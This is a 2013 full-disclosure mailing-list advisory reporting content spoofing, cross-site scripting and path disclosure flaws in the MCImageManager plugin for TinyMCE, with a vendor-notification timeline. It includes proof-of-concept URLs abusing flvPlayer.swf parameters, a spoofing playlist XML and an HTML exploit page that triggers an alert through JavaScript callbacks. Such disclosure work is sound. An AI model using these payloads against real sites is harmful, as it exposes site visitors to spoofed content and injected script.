Date: Sat, 17 Aug 2013 17:06:16 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>,
 "1337 Exploit DataBase" <mr.inj3ct0r@...il.com>
Subject: CS,
	XSS and FPD vulnerabilities in MCImageManager for TinyMCE

Hello list!

I want to warn you about vulnerabilities in Moxiecode Image Manager 
(MCImageManager). This is commercial plugin for TinyMCE. It concerns as 
MCImageManager, as all web applications which have MCImageManager in their 
bundle.

These are Content Spoofing, Cross-Site Scripting and Full Path Disclosure 
vulnerabilities. About Content Spoofing and Cross-Site Scripting 
vulnerabilities in flvPlayer I informed developer already in October 2011 
(it was part of Media plugin for TinyMCE) and disclosed them in November. 
After my informing he fixed these holes in November 2011 in Media plugin. 
But he forgot to fix them in MCImageManager plugin.

-------------------------
Affected products:
-------------------------

Vulnerable are Moxiecode Image Manager 3.1.5 and previous versions.

-------------------------
Affected vendors:
-------------------------

Moxiecode
http://www.moxiecode.com

----------
Details:
----------

Content Spoofing (WASC-12):

Flash-file flvPlayer.swf accepts arbitrary addresses in parameter flvToPlay 
and startImage, which allows to spoof content of flash - i.e. by setting 
addresses of video and/or image files from other site.

http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.flv

http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?autoStart=false&startImage=1.jpg

http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.flv&autoStart=false&startImage=1.jpg

Flash-file flvPlayer.swf accepts arbitrary addresses in parameter flvToPlay, 
which allows to spoof content of flash - i.e. by setting address of playlist 
file from other site (parameters thumbnail and url in xml-file accept 
arbitrary addresses).

http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.xml

File 1.xml:

<?xml version="1.0" encoding="UTF-8"?>
<playlist>
 <item name="Content Spoofing" thumbnail="1.jpg" url="1.flv"/>
 <item name="Content Spoofing" thumbnail="2.jpg" url="2.flv"/>
</playlist>

XSS (WASC-08):

If at the site at page with flvPlayer.swf (with parameter jsCallback=true, 
or if there is possibility to set this parameter for flv_player.swf) there 
is possibility to include JS code with function flvStart() and/or flvEnd() 
(via HTML Injection), then it's possible to conduct XSS attack. I.e. 
JS-callbacks can be used for XSS attack.

Example of exploit:

<html>
<body>
<script>
function flvStart() {
 alert('XSS');
}
function flvEnd() {
 alert('XSS');
}
</script>
<object width="50%" height="50%">
<param name=movie value="flvPlayer.swf">
<param name=quality value=high>
<embed src="flvPlayer.swf?flvToPlay=1.flv&jsCallback=true" width="50%" 
height="50%" quality=high 
pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" 
type="application/x-shockwave-flash"></embed>
</object>
</body>
</html>

Full Path Disclosure (WASC-13):

Full path In cookies MCManager_im_lastPath and MCManagerHistoryCookie_im.

------------
Timeline:
------------ 

2011.10.20 - informed developer of flvPlayer.
2011.10.20 - informed developer of TinyMCE (which bundled with flvPlayer in 
Media plugin).
2013.06.11 - announced at my site.
2013.06.13 - informed developer of MCImageManager.
2013.08.16 - disclosed at my site (http://websecurity.com.ua/6562/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists